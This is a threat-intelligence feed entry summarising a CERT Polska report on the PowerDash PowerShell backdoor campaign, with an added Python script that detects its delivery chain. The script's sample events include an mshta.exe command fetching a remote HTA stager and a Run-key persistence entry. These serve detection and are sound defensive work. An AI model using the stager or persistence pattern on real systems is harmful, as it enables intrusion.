Malspam campaign delivering PowerDash – a tiny PowerShell backdoor
ID: 5253e0b4-b8b7-570c-921c-30ce25a21297
STIX ID: report--5253e0b4-b8b7-570c-921c-30ce25a21297
Feed Name: CERT Polska
CERT.PL observed a malspam campaign distributing a newly identified PowerShell malware family, "PowerDash". The lure is a malicious Word attachment that exploits CVE-2017-0199 (the Office OLE/HTA handler vulnerability) to launch an HTA-based stager. The stager establishes persistence through mshta.exe, then fetches an obfuscated PowerShell payload that enumerates host details, registers with a Python/Django C2 at the /dash/post_data/ endpoint, and supports remote command execution. The report covers the lure, the HTA/stager mechanics, the deobfuscation steps, the C2 internals, and a table of IoCs (IPs, URLs, and SHA256 hashes) for detection and monitoring.
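The chain above offers three cheap detection points: Word spawning mshta.exe, mshta.exe landing in a Run key, and an HTTP POST to the /dash/post_data/ registration path. The following is an added example, not code from the CERT Polska report; it runs a few rules over constructed, flattened key=value event lines in a Sysmon-like shape. The host names, IPs (documentation range) and file paths in the sample events are invented for illustration and are not the report's IoCs.

```python
"""Detection sketch for the PowerDash delivery chain (added example, not the report's code).

Events are constructed key=value lines loosely modelled on Sysmon EventID 1
(process create), EventID 13 (registry value set) and a web-proxy record.
"""
import re
from typing import Dict, List, Tuple

# Quoted values may contain spaces (e.g. "Program Files"); unquoted ones may not.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample events. IPs are from the 198.51.100.0/24 documentation range.
SAMPLE_EVENTS = [
    r'EventID=1 Image="C:\Windows\System32\mshta.exe" '
    r'ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" '
    r'CommandLine="mshta.exe http://198.51.100.7/stage.hta"',
    r'EventID=13 TargetObject="HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater" '
    r'Details="mshta.exe C:\Users\u\AppData\Roaming\u.hta"',
    r'Source=proxy Method=POST Url=http://198.51.100.7/dash/post_data/ '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    r'EventID=1 Image="C:\Windows\System32\notepad.exe" '
    r'ParentImage="C:\Windows\explorer.exe" CommandLine="notepad.exe"',
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one flattened key=value event line into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of every PowerDash-chain rule the event matches."""
    hits: List[str] = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()

    # Rule 1: an Office process launching mshta.exe, the shape of the
    # CVE-2017-0199 HTA stager fired from the lure document.
    if (event.get("EventID") == "1"
            and image.endswith("\\mshta.exe")
            and parent.endswith("\\winword.exe")):
        hits.append("office_spawned_mshta")

    # Rule 2: mshta.exe written into a Run key, the stager's persistence.
    target = event.get("TargetObject", "").lower()
    if (event.get("EventID") == "13"
            and "\\currentversion\\run" in target
            and "mshta" in event.get("Details", "").lower()):
        hits.append("mshta_run_key_persistence")

    # Rule 3: an HTTP POST to the Django C2 registration path named in the report.
    if (event.get("Method", "").upper() == "POST"
            and "/dash/post_data/" in event.get("Url", "")):
        hits.append("powerdash_c2_register")

    return hits


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run detect() over every line; return (line index, rule name) pairs."""
    return [(i, rule) for i, line in enumerate(lines) for rule in detect(parse_event(line))]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"line {idx}: {rule}")
```

Rule 3 keys only on the URL path, so it fires for any process; tightening it to PowerShell images trades coverage of renamed or proxied hosts for fewer false positives, and the right choice depends on the telemetry available.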
